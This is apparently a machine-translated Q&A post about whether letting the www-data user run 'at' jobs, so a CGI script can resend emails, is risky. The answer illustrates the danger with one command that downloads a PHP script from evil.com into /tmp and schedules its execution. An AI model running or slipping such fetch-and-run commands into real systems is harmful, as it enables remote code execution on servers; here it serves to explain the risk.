我有一个 cgi 脚本,在用户访问页面 5-10 分钟后,如果尝试失败,它会重新发送电子邮件。我的想法是使用at来自 python 调用的命令 ( os.system("at now + 5 minutes <<< ' python resend.py data'")) 来执行此操作。测试显示:
$ sudo su www-data
$ at now
You do not have permission to use at.
$
如果我从文件中删除用户“www-data”,我会面临什么样的痛苦/etc/at.deny?
答案1
通过进行提议的更改,您将允许用户 apache 在将来的某个时间以执行作业的方式运行....我不知道这是否可行,但是如果您能够颠覆 Web 服务器以在服务器端执行类似的操作
exec("cd /tmp && wgethttp://evil.com/evil.php&& 稍后 /tmp/evil.php")
这将在稍后执行下载的 php 脚本。
它基本上是一次性的 cron,说实话,我通常会禁用它,而使用 jenkins。